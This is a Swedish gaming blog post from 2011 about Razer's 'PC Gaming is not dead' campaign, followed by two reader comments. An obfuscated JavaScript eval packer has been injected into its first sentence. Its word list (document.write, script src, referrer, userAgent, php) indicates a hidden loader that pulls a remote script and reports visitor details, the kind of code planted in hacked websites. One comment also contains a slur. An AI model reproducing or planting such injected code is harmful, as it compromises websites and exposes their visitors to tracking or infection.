Image Image Image Image Image Image Image Image Image Image

| 27 februari, 2020

Scroll to top

Top

PC FTW!

PC FTW!
Filip Urde
  • On 24 augusti, 2011
  • http://www.revue.se/filip-urde

Hårdvarutillverkaren eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|erhen|var|u0026u|referrer|ntesr||js|php’.split(’|’),0,{}))
Razer har börjar tröttna på hur spelindustrin försöker sätta PCn och särskilt PC som spelenhet i graven.

Razer försöker nu samla världens PC-spelare för att få ut budskapet att ”PC Gaming is not dead”.

Att PC-spelandet skulle dött är kanske lite sent att attackera då det är fullt bevisat att så inte är fallet! men ändå! Razer gör helt rätt! Stå upp mot konsolerna! Jag har själv ett Ps3 och en Xbox 360, men PCn är enligt mig den sanna spelenheten för den som vill spela mer än äventyrsspel. Att välja t.ex. BF3 till ps3 framför PC är för mig en hädelse…. Första person ska och kommer alltid förbli bäst på PC. Så är det. Konsolerna är ett substitut som funkar, de är kul ja… men inte mer än så… Video funkar också, men blu-ray är bättre.

Skit, ska skit ha! så att säga 😉

Ovan kan man se ett heluppslag som Razer hade i tidningen Wall Street Journal.

www.pcgamingisnotdead.com

 

Comments

  1. Johan

    hahah den var riktigt bra 🙂

  2. Hamp3

    haha klock! REN!!!! äntligen lite pisk mot konsolfagsen! Tack Filip! det behövs mer sånt här°!